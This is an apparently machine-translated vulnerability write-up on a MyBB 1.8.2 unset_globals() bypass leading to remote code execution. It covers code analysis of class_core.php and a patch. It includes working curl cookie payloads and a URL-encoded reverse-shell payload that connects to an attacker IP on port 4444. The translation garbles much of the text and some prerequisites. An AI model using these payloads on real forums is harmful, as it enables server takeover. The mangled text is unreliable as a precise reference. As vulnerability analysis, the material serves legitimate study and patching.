MyBB & lt; 1.8.2unset _ globals () FunctionBypassandRemoteCodeExecution (ReverseShellExplo. catalogue
1. vulnerability description 2. vulnerability trigger conditions 3. impact scope 4. vulnerability code analysis 5. defense methods 6. attack and defense thinking
1. vulnerability description
MyBB's unset_globals () function can be bypassed under special conditions and it is possible to allows remote code execution.
Relevant Link:
https://cxsecurity.com/issue/WLB-2015120164https://packetstormsecurity.com/files/134833/MyBB-1.8.2-Code-Execution.htmlhttps://www.exploit-db.com/exploits/35323/
2. vulnerability trigger conditions
0x1: POC1
// Php. ini configuration 1. request_order = "GP" 2. register_globals = On // remote code execution by just using curl on the command line3. curl -- cookie "GLOBALS = 1; shutdown_functions [0] [function] = phpinfo; shutdown_functions [0] [arguments] [] =-1 "http: // 30.9.192.207/mybb_1802/
PHP automated verification script
0x2: POC2
//php.ini1. disable_functions = ini_get2. register_globals = On//url3. index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
0x3: POC3
// Php. ini configuration 1. request_order = "GP" 2. register_globals = On // urlcurl -- cookie "GLOBALS = 1; shutdown_queries [] = SQL _Inj" http://www.target/css.php//Works on disable_functions = ini_get and register \ _ globals = On: css. php? Shutdown_queries [] = SQL _Inj
3. scope of impact
MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
4. vulnerability code analysis
\ Mybb_1802 \ inc \ class_core.php
.. // If we 've got register globals on, then kill them too/* When PHP's register_globals configuration set on, MyBB will call unset_globals () functionall global variables registered by PHP from $ _ POST, $ _ GET, $ _ FILES, and $ _ COOKIE arrays will be destroyed. this is a security mechanism implemented by MyBB. at the beginning of each PHP script request, "Super global variables automatically register for reverse processing ", offset possible security problems caused by register_globals */if (@ ini_get ("register_globals") = 1) {$ this-> unset_globals ($ _ POST ); $ This-> unset_globals ($ _ GET); $ this-> unset_globals ($ _ FILES); $ this-> unset_globals ($ _ COOKIE );}.. /*** Unsets globals from a specific array. ** @ param array The array to unset from. */function unset_globals ($ array) {if (! Is_array ($ array) {return;} foreach (array_keys ($ array) as $ key) {unset ($ GLOBALS [$ key]); unset ($ GLOBALS [$ key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4 }}
This logic seems to be okay, and is defensive for security considerations. However, due to some features of the PHP kernel, the execution of the unset_globals () function can be bypassed.
1. normally, variables input through GPC are automatically unset $ GLOBAL [$ var] even if register_globals is enabled, this is MyBB's own implementation of a set of defense lower version PHP mistakenly enable register_globals = On code logic, which defends against the occurrence of local variable overwrite 2. however, there is a special variable GLOBALS. The $ GLOBALS Super Global array is created and maintained by the PHP kernel. we can read and write $ GLOBALS ['key'] anywhere in the program. the PHP kernel is bound to the connection between the $ GLOBALS array and the global symbol table. 3. if the hacker passes in: foo. php? If GLOBALS is 1, MyBB will execute unset ($ GLOBALS ["GLOBALS"]); this will directly cause the connection between $ GLOBALS and global symbol table 4. the direct consequence is $ _ GET, $ _ POST, and $ _ COOKIE .. unable to get the user-passed parameter key, because basically the GPC parameter is obtained from $ GLOBALS, so the unset operation will not work properly
Note that this problem \ mybb_1802 \ inc \ class_core.php has been noticed in the defense framework of MyBB.
..function __construct(){ // Set up MyBB $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS"); foreach($protected as $var) { if(isset($_REQUEST[$var]) || isset($_FILES[$var])) { die("Hacking attempt"); } } ..
MyBB is intended to prevent the value of global variable parameters from being affected by GET/POST/GLOBALS, but the $ _ REQUEST in PHP is also a super global variable, its value is determined by php. ini impact. after PHP5.3, request_order = "GP", that is, $ _ REQUEST only includes parameters in GET/POST, which directly results in invalid filtering of COOKIES, hackers can put variables in COOKIES to overwrite the payload attacks.
GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2Dr%20%27%24sock%3Dfsockopen%28%22$yourip%22%2C%204444%29%3Bexec%28%22%2Fbin%2Fsh%20%2Di%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27;
To sum up, there are two scenarios for the use of the prerequisite:
1. MyBB <= PHP 5.3: request_order = "GP"2. PHP 5.3 <= MyBB <= PHP 5.4: register_globals = On
Understanding the premise of variable coverage, the next step is to see how the Payload attack constructs and triggers the local variable overwrite \ mybb_1802 \ inc \ class_core.php
// Class_core.php is a file called by almost all page scripts. the following destructor are frequently called by function _ destruct () {// Run shutdown function if (function_exists ("run_shutdown") {run_shutdown ();}}
Run_shutdown (); \ mybb_1802 \ inc \ functions. php
/*** Runs the shutdown items after the page has been sent to the browser. **/function run_shutdown () {// the $ shutdown_functions was initialized via add \ _ shutdown () function in init. php // but because of the local variable overwrite vulnerability, $ shutdown_functions can be hijacked globally $ config, $ db, $ cache, $ plugins, $ error_handler, $ shutdown_functions, $ shutdown_queries, $ done_shutdown, $ mybb; if ($ done_shutdown = true |! $ Config | (isset ($ error_handler) & $ error_handler-> has_errors) {return ;}.. // Run any shutdown functions if we have them if (is_array ($ shutdown_functions) {foreach ($ shutdown_functions as $ function) {call_user_func_array ($ function ['function'], $ function ['arguments']) ;}} ..
Relevant Link:
http://0day.today/exploit/22913
5. defense methods
\ Inc \ class_core.php
class MyBB { .. function __construct() { // Set up MyBB $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS"); foreach($protected as $var) { /*if(isset($_REQUEST[$var]) || isset($_FILES[$var]))*/ if(isset($_GET[$var]) || isset($_POST[$var]) || isset($_COOKIE[$var]) || isset($_FILES[$var])) { die("Hacking attempt"); } } ..
Relevant Link:
http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/http://cn.313.ninja/exploit/22913
6. attack and defense
Copyright (c) 2016 Little5ann All rights reserved